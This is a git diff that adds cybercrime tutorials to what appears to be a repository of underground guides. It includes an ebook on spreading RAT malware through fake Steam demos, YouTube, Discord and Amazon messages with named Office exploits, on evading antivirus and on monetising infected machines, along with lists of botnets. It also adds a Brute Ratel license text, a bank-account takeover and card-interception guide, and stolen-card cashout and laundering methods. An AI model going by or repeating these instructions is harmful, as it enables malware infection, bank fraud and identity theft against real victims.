So get your infected file +uploaded to some sort of uploading site which people can download it +from. Now head back to your Fake games Steam concept page. If +you're having trouble getting there Hover over Community on Steam, +Click on Greenlight, Hover over Browse and Click Concepts. Now on +the right hand side there's a Hyperlinked text named “Your +Submissions”, Click on that and it will take you to a list of all your +Submissions. +Once there. click on the Announcements Tab, then click on the Post +new announcements button. + +Now we're going to post an announcement. We need to give it a title +and description. A good title is something such as “DOWNLOAD +DEMO”. In the description you'll be linking to the download. So a +good description would be something like: “Check out our games +demo at WWW.YOURFILEDOWN.COM It's totally free for you to +check out. Be sure to leave us feedback on our game so far. (:”. +This announcement will show up right below your fake games +showcase. The title will be in big Blue letters, and below it will be the +download link. This will attract the viewer's eyes. + +We're nearly done now, the only thing left to do is get your steam +concept popular so people actually see it. Luckily, this is very easy +and only requires 4 or 5 people. So, get four or five friends to go to +your fake games concept page and ask them to Click the Thumbs up +button, the Favorite button, and the follow button. +If you're like me though you have no friends, so we're going to utilize +Hackforums to get this step done. Often people in the Free Services +and Giveaways section will offer to do favors such as clicking links, +subscribing & following on sites, etc. You can head over there and ask +some of them to Rate, like, Favorite, and follow your steam concept +page. +If you're an ub3r member you're in luck. You can go to the VIP Area +and click on the Gay Fucking Requests Cuz You Want Free Shit sub +form and create a thread asking people to Like, Favorite, and follow +your steam concept page. +Lastly, if you have a few nickels and dimes laying around you can +post a thread in the rewards for small favors section offering a small +reward of a few cents for people to to Like, Favorite, and follow your +steam concept page. +Just be sure, whatever route you go down to get these Likes, +Favorites, and follows you warn the user not to download the demo. +You wouldn't want to infect your friends or Hackforums members. +It only took me 8 likes to rank my concept within the first two rows of +concepts. + +9. Youtube spreading: +I will start this first method on one of the most known and simplest +methods. But most users cannot correctly use this method to spread. +Youtube has a massive audience and traffic runs through it Dailey. +This is a great target for us, and this is where we will be spreading. +This is why I’ll be explaining this method to you. As the install rate is +very successful when it comes to infections. Now you will want to +make an account at Youtube if you haven’t already done so. +You have just made and account. You have no audience around your +channel. But to get installs you will want to have an audience around +your channel either legitimate or bots. It doesn’t matter as long as your +channel looks legitimate. +Now when spreading your stub to gather infections on Youtube you +will want to aim at a specific audience for installs. For example, +Runescape, Counter Strike, Dota 2, Giveaways. Anything which +attracts an audience name it your video. But also remember, thinking +outside the box when naming your Youtube video does affect your +infection rate. If you suit your Youtube videos to real life scenarios +and media it can attract a massive amount of traffic. + +Now to use this method efficiently, you’ll need some third-party +application to bring in the likes, views and subs to your youtube video. +To do this, just use one of the following sites. +http://www.ytmonster.net/ +http://www.u2bviews.com/ +http://www.shareyoutubevideos.com/ http://www.addmefast.com/ +http://www.youlikehits.com/ +http://www.view2.be/ +http://www.ytmax.com/ +http://www.websyndic.com/ +Now once you’re sorted with views, likes and subs, it’s time to find a +Youtube video. Now as I’ve said before it’s about finding the correct +audience you wish to target personally as a user. It’s up to you what +you want to decide to go for in terms of installs and slaves. But within +this guide I’ll give you a example on how to do this. I’ll use a +Runescape video to show you exactly what I mean. +Now when finding a video it is important not to use a video when a lot +of views, but find a video which doesn’t have many views and is +perfect for the job. +Now I’m going to do a YouTube search for the video I want to use. I +wish to target Runescape players for example, so I will need to find +something which Runescape players would want and search for when +it comes to YouTube. +Now I’ve chosen to use a Runescape Private Server Video to attract a +audience to my video to get successful infections. I know for a fact +people are always going to release runescape private servers so this is +a very good example on how to use Youtube to spread for infections. + +So I’ve found my Video, but how do I upload it if I want to use it? +That’s easy, copy paste the URL from the Youtube Video you have +searched and wish to use into one of these websites which is able to +convert YouTube videos to a video file. +http://www.clipconverter.cc/ +www.onlinevideoconverter.com/video-converter +Now once you have downloaded your Video, you will want to upload +your Youtube video with a link to your RAT in the description. Make +the description and title to your video look legitimate. +Now we have uploaded our video to YouTube, it is now time to use +the credits you have gathers using Enhance views on your YouTube +video. Depending how many credits you have depends on how many +installs you will receive. You will want to use your credits mainly on +views and likes and comments. These are the 3 main contents of +spreading via YouTube. It makes your audience believe this is +legitimate and will download your infected file. +Almost just a hint when spreading via YouTube. Call it something +“New” or “Brand New” this makes creates more traffic as this has +work on majority of videos with these words in the title. + +10. Advenced youtube spreading: +Hello and welcome to another chapter of Instantly Spreading. This +chapter will be based upon Youtube. In V1 of Instantly Spreading +guide we covered a Youtube method to gather installs. This time I +want this to be more advanced, and detailed with more informational +content, and advanced methods & advice, and this is due to YouTube +having security on it’s videos, which stops us spreading, as YouTube +is defiantly a high rated spreading source. So I wish to help you gain +the best outta of YouTube spreading. +Things to know about Youtube spreading +When spreading on Youtube, all videos you upload should be unique, +or your own. So basically a video that has never been uploaded before +on Youtube, as youtube usually will auto detect a video which has +been uploaded before and remove your content. This why you should +go with a video of your own or unique. +If you’re lazy and don’t have a video of your own, that’s ok, you can +find other video from another website and upload them to Youtube. +For example a video from: Vimeo, Metacafe, Facebook, etc.. After +obtaining the video you wish to upload, make sure you edit the video +with an editing program like Sony Vegas, and edit the introduction or +outro. (You can do this with a Youtube Video, but I wouldn’t +recommend it, as it’d get taken down faster) +When spreading on Youtube you’ll want to keep your audience feeling +safe as possible. So using nonblackhat titles within your video will +make your audience feel say. +An example of a non-blackhat title: How to get free flyer points (No +hack or generator) +Example of a blackhat title: Flyer Points Hack See how I’ve used the +titles in a way to trick the audience ! + +Getting Views, Likes and Subs ! Getting more views, like and subs is +essential to YouTube spreading. As having more of them, will get you +more installs. There are many sites which will give you +views/likes/subs for money or doing a service for them. +Here are some Youtube bot website to help you get views/likes/subs. +- www.Vagex.com +- www.Hitleap.com +www.Like4like.org +- www.View2.be +- http://www.ytmonster.net +- www.Subpals.com +Video ideas for spreading Now when selecting an idea for your video +for spreading, you’ll need to think which audience you wish to target, +there are plenty of audiences on YouTube to target, you just need to +think of an idea surrounding that platform or audience so gather +installs. +So here is an idea list for your videos as an example. +- RSPS looking for staff - Clash of Clans Mod 2016 +- CSGO Knife Mod +- RS 07 Bots +Really depending on your targeted audience, you’ll want a video and +title/description relating to your given audience. + +11. Spreading via discord: +Discord is a voice/chat platform program,just like Skype, and +designed to communicate with others. I haven’t seen spreading +methods used for Discord out there, so I thought I’d put together a +method on how to gather installs using Discord to spread. This method +is designed for targeted spreading also. So please take into account +this method isn’t autopilot, and does involve you doing work and +communicating. But don’t worry it will pull off. +This method requires +- Discord: +- A VPN or proxy +- Domain/Webhost +- FUD stub +- You can use my methods, or think of your own niche ! +- Your targeted Discord channel (http://discord.me/servers or google +search for some) +Now once you have Discord installed, it’d be best to use a VPN or run +discord through a proxy. This is due to you spreading. Now once +you’ve done that, you’ll want to make an account at Discord. You +won’t need email verification to verify your account (And if you do, +just make sure you use a legit email). +Once you’ve done that, you’ll see that Discord is a communication +service, so in order to gather installs with this method you’ll need to +communicate with your victims. +Now you’re up to the stage of choosing your targeted Discord +channel. Go here to find a channel of your choosing: +http://discord.me/servers +After you’ve selected your channel, and are all setup. It’s time to get +spreading ! +To spread your malware to victims on Discord, all you need is a niche +relating to the Discord channel of your choosing. So depending on the + +channel you wish to go for, you’ll need to change the style of this +method to the suitable channel. +For this example, I’ve chosen a Runescape channel, so my method of +gathering installs must work around using Runescape type material to +trick your victims to download your file. +Now join the channel with the account you made on Discord for +spreading. When joining the channel you will see a list of users +online/away/offline on the right side. And on the leftside you will see +voice chatrooms. If you know a thing about SE, then using your voice +to trick your victims into downloading your malware will work more +better due to the fact people seem to trust you more if you talk to them +via voice. But for this method, we will just use the chat to gather out +victims. +Now as I’m trying to target Runescape victims within a Runescape +Discord channel I’ll need to focus my idea to spread relate around +Runescape. Now make sure you have a FUD stub, and you’ve binded +your jpeg or other file type to your malware, as we will try and stay +away from using a .exe extension. Now make sure you have your +domain and webhosting setup, so you can have a download link to +your malware. “www.yourdomain.com/picture.jpeg”. Note: You could +also use a marco or silent exploit to do this, or the tumblr method I’ve +written below this chapter. +Now as I’m targeting Runescape players, I’ll need to think of a way to +get them to download the link, and execute the file, so you can infect +them. I’ve done something like this below, you can have it different to +suit your idea of spreadings with Discord. As it’s all communication +with this method, and tricking them to download your file. + +12. spreading on amazon. +Requirements: +– .xls od .doc exploit +General concept: +Amazon allow you to send messages to people, you can target small or big +sellers, below is one example, you need to be creative and you will easy +get good clients. You can buy office exploit on exploit.im forum. The most +effective exploits: +CVE 2017-0199 +CVE 2017-8759 +CVE 2017-11882 +For cheap you can use office macro but it will be less effective. For best +results you should use good runtime fud bot and exploit. Below is one +example of message. +Good afternoon, +First of all, sorry for not speaking German, my German is horrible so I +would prefer to keep it an English conversation if that's okay. +I was browsing Amazon, and I saw that you are selling watches on here. +I'm a watch reseller myself, and I'd like to order a big amount of watches. +Considering the amount of watches I am looking to buy, I'm hoping it'd be +possible to give me a bulk discount. +I've made up a proposal, I'll add a document. The document contains the +models I want to buy, which price I want to pay and how many I'd like to +buy. +If you're interested in my proposal, I'd love to hear it. You can contact me +back at jonathan.connels@yandex.com. +Thanks for your time and have a nice day, I look forward doing business +with you. +Sincerely, +Jonathan Connels. + +Staying annonymous(basic): +Now trying to stay Anonymous isn’t always easy as you’d think it is. +There are more things then just hiding your IP on a private or public +VPN, and there is lots of ways and methods we can choose to do when +staying Anonymous. Firstly I will talk about some of the main things +and concepts to cover when trying to hide yourself and your virus. +When creating a DNS, and depending on the DNS service provider +you’ve chosen, your IP will always be traced. As a DNS is used to +change a IP into a domain. So when running your DNS with your real +IP or even creating it with your real IP for the first time you still leave +traces like account registrations and converting your IP into your +DNS. You guys need to know that everything gets logs. The world is +going to be fully based on technology in the next generations to come, +so you must also put into idea when staying Anonymous that world +physical and logically world will change, so it’s a good idea to keep +up to date with technology. When staying Anonymous I’d highly +recommend using a VPN (Virtual Private Server) +Maintaining your slaves: +To ensure you keep your connections, it’s vital to maintain your slaves +to avoid detections. The best way to do is this is by scanning your stub +you’re using to spread 1 – 2 times a day. I recommend using. +Scan.majyx.net nodistribute.com razorscanner xcscanner.com Once +you’ve scanned and you’ve analyzed the scan, it’s up to you if you +wish to refud your connections to avoid it being picked up by AV’s. +If your stub is detected use your crypter to recrypt your uncrypted file +and update them on your slaves using the update feature your RAT +should have. Majoirty of RATs have update features. + +Monetizing bots: +Monetizing Your Infections Throughout the versions of Instantly +Spreading, I also wish to share with you on monetizing your infections +while spreading. This is not a spreading method, although it’s an +income method which explains the multiple types of ways you can +monetize your infections. +So here are some bullet points on how to monetize your infections + Premium Accounts - Accounts like Netflix, spotify, Hulu, +Runescape, Minecraft, and large and famous +Facebook/Instagrams/Twitters are worth money on the market, and +people pay for these. + Crypto Mining - Mining for Crypto Currencys, or Alt Currencys will +also make you money. But this depends on how many infections you +have  Virtual Items - Virtual Items are also worth money and are very +profitable and are worth targeting if you want money. Games which +have a decent value of virtual items are, CS:GO, Runescape 07 & +EOC, Habbo, Dota2 + Ransomware/Survey Locker - Ransonware/Survey Locker is very +good, as you’ll make your infections believe you’ll need to pay in +order to access their machine. This means money for you. + Referral Links Copyright 2016 © InstantlySpreading.com - Sending +your victims to referall links, and other sites, even PPI is a very good +way to make cash + Sell your bots ? - People buy bots all the time, if you think you can +manage your bots, aswell as sell them at the same time, I do +recommend this, as it is very profitable + DDoS Services - Running DDoS services are also a quick way for +cash, as you’ll always find a buyer within this area looking to down +something + Blackmail - I’ll let you figure this out for yourself + +ADDONS: +Paid botnets you may use: +– smoke botnet https://forum.exploit.in/index.php?showtopic=51308 +– quant loader https://forum.exploit.in/index.php?showtopic=108142 +– Miner Bot https://forum.exploit.in/index.php?showtopic=125036 +– Azorult stealer +https://forum.exploit.in/index.phpshowtopic=104180&st=100 +– Godzilla loader https://forum.exploit.in/index.php?showtopic=98946 +– neutrino botnet https://forum.exploit.in/index.php?showtopic=78268 +– formbook https://hackforums.net/showthread.php?tid=5264027 +Free botnets you may use: +Botnet files i have included with this ebook: +– Betabot 1.8.0.11 – its a multi task and native bot, its old and cracked +builder so not all function are working. But this is still one of the best +choice to hold good amount of bots. This botnet has strong botkiller, +AV killer, persistence, few ddos methods, hosts file editor and much +more. +– Novobot – its just a loader coded in c++, hidden from task manager. +Cracked builder. – Gaudox 1.0.0.1 +– another free loader, released for free by excr4sh. With good crypter +its one of the best choices if you need to hold good amount of bots. +– Loki 1.6 – its old version of popular stealer. Cracked builder 1.6 +– OmegaNet – its simple multi-task botnet, based on +litehttp(opensource). +– Diamondfox 4.2.0.650 Multi task botnet, builder is in virtual +machine. + +Final words: +Thank you for buying, feel free to contact me if u face any problem. +Also a post/vouch made by you in my thread, will be highly appreciated +All informations provided here by me are ONLY for EDUCATIONAL +Purposes, I am not responsible for any Illegal activity by the user in any +case. +valkyrie_sec@yahoo.com +Jhon Greenson +417 addison ave +8N847990PE043363F +FireStrike diff --git a/Brute Ratel EULA_pdf.md b/Brute Ratel EULA_pdf.md new file mode 100644 index 0000000..61f2051 --- /dev/null +++ b/Brute Ratel EULA_pdf.md @@ -0,0 +1,183 @@ +# Brute Ratel EULA + + +--- + +END USER LICENSE AGREEMENT +FOR +BRUTE RATEL C4 +Dark Vortex sells licenses and provides support for Brute Ratel C4 for legitimate research and +lawful penetration testing services. Brute Ratel C4 is a penetration testing tool and does not promote +or support unlawful activities. Brute Ratel C4 is an extremely technical software and it is only +meant to be used by professionals with expertise in a similar field. It is up to the user to make sure +the software meets your needs. Dark Vortex does not provide support for additional tools or exploit +softwares which can be used alongside Brute Ratel C4. Dark Vortex is only responsibile for Brute +Ratel C4 and it's modules provided alongside during the purchase in accordance with this license +agreement. All users acknowledge that Dark Vortex disowns all liability for damages caused by the +use of Brute Ratel C4 or it’s modules provided as a part of the software. Dark Vortex reserves the +right to cancel the license if it is found to be used for unlawful activities. Please make sure you read +through, understand and agree with these terms before you purchase or download Brute Ratel C4. +END USER LICENSE AGREEMENT +Brute Ratel C4 (the “Software Product” or “Software”) and accompanying documentation, modules +is provided as a limited license and not sold. This Software Product is protected by copyright laws +and treaties, as well as laws and treaties related to other forms of intellectual property. Dark Vortex +owns the intellectual property rights in the Software Product. The Licensee's ("you" or "your") +license to download, use, copy, or change the Software Product is subject to these rights and to all +the terms and conditions of this End User License Agreement ("Agreement"). +Acceptance +YOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS AGREEMENT BY +SELECTING THE "ACCEPT" OPTION AND DOWNLOADING THE SOFTWARE PRODUCT +OR BY INSTALLING, USING, OR COPYING THE SOFTWARE PRODUCT. IF YOU ARE +ENTERING INTO THIS AGREEMENT ON BEHALF OF A COMPANY OR OTHER LEGAL +ENTITY, YOU REPRESENT THAT YOU HAVE THE AUTHORITY TO BIND SUCH ENTITY +TO THIS AGREEMENT. YOU MUST AGREE TO ALL OF THE TERMS OF THIS +AGREEMENT BEFORE YOU WILL BE ALLOWED TO DOWNLOAD THE SOFTWARE +PRODUCT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, YOU +MUST SELECT "DECLINE" AND YOU MUST NOT INSTALL, USE, OR COPY THE +SOFTWARE PRODUCT. +License Term/Grant +The License Term is the period in which the Licensee is authorized to use the software. This period +is specified when the product is ordered. A usual License Term is one year from the date of purchase +which is hereby considered as default. Brute Ratel C4's default license is for one user per license +key for one year. . Dark Vortex hereby grants to the Licensee, during the License Term only, a non- + +exclusive, non-transferable license to use Brute Ratel C4 solely for ethical penetration testing +purposes only. Licensee shall ensure that only one User uses the software for each purchased license +key. No other users are licensed/authorized to use the Software. However, any number of operators +can connect to the server hosted by a user to engage with the Software. A single user is only allowed +to host, a maximum of and no more than two servers (hereon known as the RATEL Server) at any +given point of time. +Trial License +Dark Vortex provides trial version of Brute Ratel C4 for evaluation purposes to selective individuals +and companies. Subject to the terms and conditions of this agreement, Dark Vortex provides the trial +license as a non-exclusive, non-transferable license to use Brute Ratel solely for evaluation +purposes only. The trial licenses are not eligible for any updates and several artefacts within the +software are hardcoded which can trace the metadata of the software back to the licensee. This +limitation of artefact does not apply to a purchased license whatsoever. The default trial term is 7 +days. The trial licenses are not to be sold and can be revoked by Dark Vortex at any point of time. +Updates +Dark Vortex grants the right to use Brute Ratel or any part of this software, software updates during +the license term only. During the license term, users shall be entitled to receive updates to the +software product that add additional features as made available with every release. There shall be no +extra cost for any new software component and all new components will be made available to the +end users. Users shall not distribute any information regarding Brute Ratel C4, its components, +updates or any related derivative works to any third parties, including but not limited to, anti-virus +vendors or to organizations that collect samples for anti-virus vendors or for reverse engineering. +Support +Dark Vortex offers support over E-mail and Discord for the Software during the License Term only. +Dark Vortex is not obligated to support third-party products or dependencies used with the +Software. +Restrictions on Transfer +Without first obtaining the express written consent of Dark Vortex, you may not assign your rights +and obligations under this Agreement, or redistribute, sell, rent, lease, sublicense, or otherwise +transfer your rights to the Software Product. +Restrictions on Use +You may not "reverse-engineer", disassemble, or otherwise attempt to derive the source code for the +Software Product. The software product is developed in a manner to protect itself from “reverse- +engineering” and debugging and it would stop working if in any manner is tampered with. Dark +Vortex reserves the right to not provide support during such engagements. + +Restrictions on Alteration +You may not modify the Software Product or create any derivative work of the Software Product or +its accompanying documentation. Derivative works include but are not limited to translations. You +may not alter any files or libraries in any portion of the Software Product. +Disclaimer of Warranties and Limitation of Liability +THE SOFTWARE PRODUCT IS BEING PROVIDED "AS IS" AND UNLESS OTHERWISE +EXPLICITLY AGREED TO IN WRITING BY DARK VORTEX, DARK VORTEX MAKES NO +OTHER WARRANTIES, EXPRESS OR IMPLIED, IN FACT OR IN LAW, INCLUDING, BUT +NOT LIMITED TO, ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS +FOR A PARTICULAR PURPOSE OTHER THAN AS SET FORTH IN THIS AGREEMENT OR +IN THE LIMITED WARRANTY DOCUMENTS PROVIDED WITH THE SOFTWARE +PRODUCT. +LICENSEE WARRANTS THAT THE SOFTWARE PRODUCT WILL BE USED BY AN +EXTREMELY TECHNICAL AND SKILLED USER AND MUST BE USED IN A SAFE AND +ETHICAL MANNER. DARK VORTEX MAKES NO WARRANTY THAT THE SOFTWARE +PRODUCT WILL MEET YOUR REQUIREMENTS OR OPERATE UNDER YOUR SPECIFIC +CONDITIONS OF USE. DARK VORTEX MAKES NO WARRANTY THAT OPERATION OF +THE SOFTWARE PRODUCT WILL BE SECURE, ERROR FREE, OR FREE FROM +INTERRUPTION. +YOU MUST DETERMINE WHETHER THE SOFTWARE PRODUCT SUFFICIENTLY MEETS +YOUR REQUIREMENTS FOR SECURITY AND UNINTERRUPTABILITY. YOU AND ONLY +YOU, BEAR THE SOLE RESPONSIBILITY AND ALL LIABILITY FOR ANY LOSS +INCURRED DUE TO FAILURE OF THE SOFTWARE PRODUCT TO MEET YOUR +REQUIREMENTS. DARK VORTEX WILL NOT, UNDER ANY CIRCUMSTANCES, BE +RESPONSIBLE OR LIABLE FOR THE LOSS OF DATA ON ANY COMPUTER OR +INFORMATION STORAGE DEVICE. UNDER NO CIRCUMSTANCES SHALL DARK +VORTEX, ITS DIRECTORS, OFFICERS, EMPLOYEES OR AGENTS BE LIABLE TO YOU OR +ANY OTHER PARTY FOR INDIRECT, CONSEQUENTIAL, SPECIAL, INCIDENTAL, +PUNITIVE, OR EXEMPLARY DAMAGES OF ANY KIND RESULTING FROM THIS +AGREEMENT, OR FROM THE FURNISHING, PERFORMANCE, INSTALLATION, OR USE +OF THE SOFTWARE PRODUCT, WHETHER DUE TO A BREACH OF CONTRACT, BREACH +OF WARRANTY, NEGLIGENCE OF DARK VORTEX OR ANY OTHER PARTY, EVEN IF +DARK VORTEX IS ADVISED BEFOREHAND OF THE POSSIBILITY OF SUCH DAMAGES, +AND ANY DAMAGES RELATING TO THE SOFTWARE PRODUCT SHALL BE LIMITED TO +THE AMOUNT PAID FOR THE SOFTWARE PRODUCT LICENSES. TO THE EXTENT THAT +THE APPLICABLE JURISDICTION LIMITS DARK VORTEX'S ABILITY TO DISCLAIM ANY +IMPLIED WARRANTIES, THIS DISCLAIMER SHALL BE EFFECTIVE TO THE MAXIMUM +EXTENT PERMITTED. +Limitation of Remedies and Damages +Any claim must be made within the applicable warranty period. All limited warranties on the +Software Product are granted only to you and are non-transferable. You agree to indemnify and hold + +Dark Vortex harmless from all claims, judgments, liabilities, expenses, or costs arising from your +breach of this Agreement and/or acts or omissions and from any claims of third parties arising out +of your use of the Software Products. +Governing Law, Jurisdiction and Costs +This Agreement is governed by the laws of the State of Maharashtra, India, without regard to +Maharashtra's conflict or choice of law provisions. +Severability +If any provision of this Agreement shall be held to be invalid or unenforceable, the remainder of this +Agreement shall remain in full force and effect. To the extent any express or implied restrictions are +not permitted by applicable laws, these express or implied restrictions shall remain in force and +effect to the maximum extent permitted by such applicable laws. +Termination +Licenses subject to this Agreement will be forfeited if you fail to comply with any of the terms of +this Agreement or are in breach of this Agreement. +Nondisclosure of Confidential Information +“Confidential Information” means all non-public, confidential or proprietary information, in +whatever form or medium, by one party to the other party or its affiliates, or to any of such party’s +or its affiliates’ employees officers, directors, partners, members, shareholders, agents, attorneys, +accountants, contractors or advisors, and shall include, but not be limited to, the Software licensed +by Dark Vortex to you, information relating to a party’s business concepts, non- public or personal +information about customers, merchandising methods, ideas, processes, formulas, data programs, +know-how, improvements, discoveries, business plans, financial information and compilations, +developments, designs, inventions, techniques, marketing plans, strategies, forecasts, potential new +product information, budgets, technology, projections, pricing strategies, costs, customer and +supplier information, consumer personally identifiable information and all other information +defined as a “trade secret” under the laws of the applicable jurisdictions. +Dark Vortex and you agree that the Receiving Party will promptly notify the Disclosing Party of any +unauthorized use or disclosure of Confidential Information, or any other breach of this Agreement; +and assist the Disclosing Party in every reasonable way to retrieve any Confidential Information +that was used or disclosed by the Receiving Party or an employee, agent and representative of the +Receiving Party without the Disclosing Party’s specific prior written authorization and to mitigate +the harm caused by the unauthorized use or disclosure. +Dark Vortex and you agree that the Receiving Party will not be in breach of this section by using or +disclosing Confidential Information if the Receiving Party demonstrates that the information used +or disclosed (a) is generally available to the public other than as a result of a disclosure by the +Receiving Party or an employee, agent and representative of the Receiving Party; (b) was received +by the Receiving Party from a third party without any limitations on use or disclosure; or (c) was +independently developed by the Receiving Party without use of the Confidential Information. + +Dark Vortex and you agree that upon the request of the Disclosing Party, the Receiving Party will +(a) promptly return to the Disclosing Party all materials furnished by the Disclosing Party +containing Confidential Information, together with all copies and summaries of Confidential +Information in the possession or under the control of the Receiving Party, and provide written +certification that all such Confidential Information has been returned to the Disclosing Party, or (b) +promptly destroy all materials furnished by the Disclosing Party containing Confidential +Information, together with all copies and summaries of Confidential Information in the possession +or under the control of the Receiving Party, and provide written certification that all such +Confidential Information has been destroyed by the Receiving Party. +Dark Vortex and you acknowledge and agree that the remedies available at law for any breach of +this Agreement will, by their nature, be inadequate. Accordingly, each Party may obtain injunctive +relief or other equitable relief to restrain a breach or 7threatened breach of this Agreement or to +specifically enforce this Agreement, without proving that any monetary damages have been +sustained. +Miscellaneous +This agreement does not create or imply any relationship in agency or partnership between you and +Dark Vortex. This Agreement and the terms and conditions contained in this Agreement apply and +are binding upon your successors and assignees. This Agreement may be updated from time to time +and any changes will be posted on our website. By continuing to access the Software after any +changes become effective, you agree to be bound by the revised terms. The failure of Dark Vortex +to enforce any right or provision of this Agreement will not be deemed a waiver of such right or +provision. In the event that any provision of this Agreement is held to be invalid or unenforceable, +the remaining provisions of this Agreement will remain in full force and effect. diff --git a/CASHOUTBANKACCTCODE10FULLZ_txt.md b/CASHOUTBANKACCTCODE10FULLZ_txt.md new file mode 100644 index 0000000..857ec11 --- /dev/null +++ b/CASHOUTBANKACCTCODE10FULLZ_txt.md @@ -0,0 +1,36 @@ +# CASHOUTBANKACCTCODE10FULLZ + + +--- + +CASHING OUT BANK ACCOUNT CODE10/FULLZ - [ALTERNATIVE METHOD] +There are So Many Tutorial here for Credit card Hacking. Here is The Tutorial for +Getting a Actual Credit card. Hope you Enjoy This. I know a guy who have done +this many time and he gave me this Method. + +1. Introduction + +So I decided to create a guide for some new people getting into the game since a lot of guides currently out there are good, but lack up to date tricks and secrets to work in 2013. The basis of the guide will cover on how I used to have the bank ship me actual credit cards of cardholders which I would then unlock for the full amount upwards of 60k in one swipe at rolex and apple. I have since left this method about 2 years ago since it became increasingly harder to do with less success. But I am still aware of certain people doing it with newer improvisation to this day. I wont go into detail on obtaining certain items, a lot of them are for sale by vendors on this forum and it is a waste of space in this guide. So lets get started. + +2.) What you need. + +The bare essentials I used to work with were, Full+ MMN info (excluding CC info) Credit report of the person. And any background information that you can pull on the intended target. You will also need a drop. And a throwaway phone (You weren't going to call the bank with your phone were you?). + +3.)Calling the Bank + +So you got your info pulled up on your computer and ready to roll. Go ahead and look through the credit report. It will show trunctured accounts with limits on credit cards and sometimes infinite limits. Now time to call that respective bank. Drive to an empty parking and get ready to call (cell phone triangulation is very real). As you call a bank it will ask you to input CC number, just hit "0" 4 to 6 times to take you to an operator. Once an operator picks up they will ask for the cc number. This is where social engineering comes into play; Say you threw it away already or you left it at the office.. etc. They will say no problem. Can I have your SSN? you tell them the SSN and then you are in the account. First thing to do is change the phone number on file to your drop phone. Then proceed to ask for an authorized user to be put on the card. Or you can request a replacement card. I prefer the first option since it dosent mess with the cardholders current card. Do not forget to mention that you are very short on time and it is important to have overnight delivery of the card (you need this). Once you are pretty much done with the ordering of the new card you are almost finished! + +But wait, here comes the security questions... Don't be deterred, I have their tricks for you. 90% of the time the bank will ask a series of 3 questions from public data/credit report. Here is the catch. ONE OF THESE QUESTIONS IS FAKE. Usually they will ask for previous address (on credit report.) Mortgage (on credit report) or who you're checking account is to make payments to card (usually same as home loan provider on credit report). Lastly, the fake question. Usually this question is so out of this world.. Like: when did you live with (name of person). Stuff that wont be on the credit report. they will list you answers A through D. the answer to this question is E, none of the above. But they don't mention this to you in hopes that the real cardholder would only know this . And after that you are home sweet home. + +It is important to undertake a kind of persona with support. you can be a major asshole. Or show extreme gratitude, ask for their supervisors email so you can submit a good review for their promotion. (make them feel good about what they are doing). I prefer the latter, people love being praised. + +4. Collecting the card +Gone are the days of shipping to drops. If you were able to do this, you must have been very lucky. Now days its going to the cardholders address. No problem, there are some methods that can help with this. usually the card will come in 2 days from when you requested, and the tracking will be up within one day. call back the bank the next day so you can track the package. Sometimes, you can call usps, or ups, or fedex and reroute packages or have them hold them at the office and use a fake ID to pickup if your social engineering is good enough that is. otherwise look into other avenues, I was able to register through UPS mychoice and reroute before it closed that option with banks packages. + +More than likely you will have to social engineer by standing outside the targets house waiting for the package to show up. (yes you need balls). Normally you can play off the homeowner and the driver will hand it straight to you. + +Anyways, its your job to be creative with this. + +5. Go shopping + +Now you can go on your shopping spree once activated, Usually the card will experience some Hold/calls for irregular activity. Just repeat calling the bank and going through security questions to unlock the full amount of the card. diff --git a/CC CASHOUT METHOD UPDATED_pdf.md b/CC CASHOUT METHOD UPDATED_pdf.md new file mode 100644 index 0000000..085bc91 --- /dev/null +++ b/CC CASHOUT METHOD UPDATED_pdf.md @@ -0,0 +1,5 @@ +# CC CASHOUT METHOD UPDATED + + +--- + diff --git a/CC cashout method1_pdf.md b/CC cashout method1_pdf.md new file mode 100644 index 0000000..e9b2f22 --- /dev/null +++ b/CC cashout method1_pdf.md @@ -0,0 +1,22 @@ +# CC cashout method1 + + +--- + +CC cashout method1 +You need: +-a Wallet 1 account http://www.walletone.com/ +-a Visa for the cashout (like the anon Visa) +-a mobile number of the same country of the card you must cash out (anon SIM+ cell +phone never used with another SIM) +-Google Translator for translate all the Russian words of these websites +Go to: +http://m-obmen.com/ +http://x.obmen.com/ +https://www.moneychange.me/ +http://www.cash4wm.com/ +list all them. +Exchange Visa USD to W1 and you’re will be redirected to the Liqpay payment processor +card so you can bypass it. You’re money will be sent to your W1 wallet. In you’re W1 +and enjoy you’re money. +FINISH diff --git a/CC to BTC - 3methods_pdf.md b/CC to BTC - 3methods_pdf.md new file mode 100644 index 0000000..d49e6d7 --- /dev/null +++ b/CC to BTC - 3methods_pdf.md @@ -0,0 +1,5 @@ +# CC to BTC - 3methods + + +--- + diff --git a/CC to BTC NO KYC_pdf.md b/CC to BTC NO KYC_pdf.md new file mode 100644 index 0000000..d729c31 --- /dev/null +++ b/CC to BTC NO KYC_pdf.md @@ -0,0 +1,190 @@ +# CC to BTC NO KYC + + +--- + +Other Cashing +Out Methods + +There are so many methods to cashout your spammed logs. Here I +would be showing you methods I have tried and still using to cashout +logs after spamming. +If for any reason they become patched, I will be giving updates on +the group on working methods. +The most important thing why we spam is to cashout. I made this +tutorial just as a guide on what you should do to cashout your logs. +For me, there are basically two things I try to cashout; +1. Credit Card +2. Bank Logs +We would concentrate on these methods. So read on and if you have +any issues, contact me. + +Before cashing out, you have to setup your system for success and +security. This is what I do. +1. Get a good RDP. I use Admin RDP from +https://greencloudvps.com or https://buycheaprdp.com You +can buy from any wher but it should me Admin RDP +2. You need a good VPN. I use 911.re always. Check the attached +guide on how to setup the 911.re VPN. +3. Google chrome. Always create a new google chrome profile for +cashout. +So this is what I do in summary. I get a RDP, Setup 911.re on the RDP +(Make sure 911 ip corresponds to the cashout info city or ZIP), the +open a new google chrome profile for each info you want to cashout. +You should always create a new email that corresponds to the info +you want to cashout (I use gmail for this). Then you need a virtual +phone number. I use gvoice (you can buy from +https://accsmarket.com ) or use this service +https://verifywithsms.com +After all these setup, then you can apply any of the cashout methods +below + +Buying Bitcoin Without ID + +1. Switchere +Switchere is a secure and reliable exchange which offers a seamless experience for instantly +purchasing crypto using a bank card. It is headquartered in Tallinn, Estonia and has two +licenses including one of Virtual Wallet Service Provider and one of Virtual Currency +Exchange Provider. +Payment Methods +At Switchere, there is only one way to purchase crypto, and that is through the use of bank or +payment card. VISA or MasterCard are the two options available to use on the site. +The exchange supports the use of both credit and debit cards of different banks. However, +cards that are issued in the banks of certain countries are not accepted by the website. These +countries are inclusive of USA, Canada, China, the UAE, and others which have been listen +on their website. +After processing the payment, users receive their funds in the wallet 